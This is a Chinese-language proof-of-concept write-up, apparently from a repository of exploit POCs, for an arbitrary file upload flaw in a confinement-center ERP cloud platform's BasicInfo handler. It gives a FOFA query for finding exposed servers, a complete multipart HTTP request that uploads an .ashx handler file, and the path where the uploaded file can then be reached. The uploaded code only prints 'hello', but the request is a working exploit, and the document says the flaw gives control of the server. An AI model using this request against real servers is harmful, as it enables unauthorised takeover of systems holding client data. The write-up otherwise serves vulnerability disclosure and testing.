POC/wpoc/月子会所ERP/月子会所ERP管理云平台BasicInfo任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

62 lines
1.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 月子会所ERP管理云平台BasicInfo任意文件上传漏洞
# 一、漏洞简介
月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件管控月子中心经营过程中各个环节。由于未对上传文件进行任何过滤BasicInfo接口可上传任意文件攻击者可利用该漏洞获取服务器控制权。
# 二、影响版本
+ 月子会所ERP管理云平台
# 三、资产测绘
+ fofa`product="妈妈宝盒-ERP"`
+ 登录页面
![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/tko20JbtQ88aBvJ4/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-831920.png)
# 四、漏洞复现
```plain
POST /Page/BasicInfo/ashx/UpLoadHandler.ashx HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_301
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 481
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="1.ashx"
<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{
get {
return true;
}
}
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("hello");
}
}
--00content0boundary00--
```
![1695621128660-95318319-a4b9-4b06-b2d6-84be4562b7a7.png](./img/tko20JbtQ88aBvJ4/1695621128660-95318319-a4b9-4b06-b2d6-84be4562b7a7-050105.png)
根据响应拼接上传地址
```plain
/UploadBaseFolder/Contact/2309259440240.ashx
```
![1695621179771-1de55016-f429-4050-b796-b55a87d0f961.png](./img/tko20JbtQ88aBvJ4/1695621179771-1de55016-f429-4050-b796-b55a87d0f961-012351.png)
> 更新: 2024-02-29 23:55:51
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gfk4yt1xarmph0m3>